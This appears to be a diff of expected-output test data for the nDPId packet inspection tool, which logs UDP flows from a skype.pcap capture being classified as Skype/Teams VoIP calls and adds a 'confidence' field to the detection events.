+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4KG4AAEARcKrAqAEinTeCmzLdnFQAJDcMm5ICyNK5iZjkkcxv0MQR2rwmgaeyTFibCj82iA=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6eUkAAEARgjTAqAEib91NjjLdnFcAJt55m5QCPbPKJuLeDOim50Iw20p93HTUvcQYvwIjUtlP"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/jgcAAEARcPDAqAEib91KDzLdnFgAK3qlm5YCVGMQ34A4D4rgbT25j64U\/rdJx+5zd3Em6+QXhoxyxA8="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5a+4AAEARkvDAqAEib91KLjLdnFsAJRNlm5gCrA8YBMpkQAilpoWSkSOFSSJ7mpap5i7P8hQ="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K\/cAAEARbLHAqAEiQTffDzLdnFoAIDycm5oCpFKxpTcQMqT3s1qudFIeHwatW0Yo"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2YJcAAEARmtjAqAEib91NoDLdnFwAInstm5wC0d61W0FRabgFV8W1nkBP2OEpO4vgeHY="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYWsAAEARhiPAqAEinTg0HDLdnEkALM83m54CE+gbUNd25CDT9n3foWmJBdcqOFnduxapZrLe74dYiza3"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwK8AAEARb0vAqAEinTfrsDLdnFYALGUnm6AC1ZExgfTg8R8Kk2ngcBhiodhOGddomI+8IvUKr50t+FQG"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ttcAAEARMM7AqAEinTg0DzLdnFsAIgnVm6IClklzvpwg0J9RRu2barB5pBf+dP\/198s="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1431969654389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969654389,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6uggAAEARpzfAqAEiQAQXpTLdnFQAJvWzm6QCh3CXl6XGrqArz4Fq72vdiruIePdvscfnf8nL"}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969654389,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1431969655399,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969655399,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+KmIAAEARBSXAqAEi1cezljLdnEQAKk92m6YCxHNRXNt6saUbXJuaVxAVloiUB3Kd06UQ7eXoZ8Yw\/Q=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969655399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
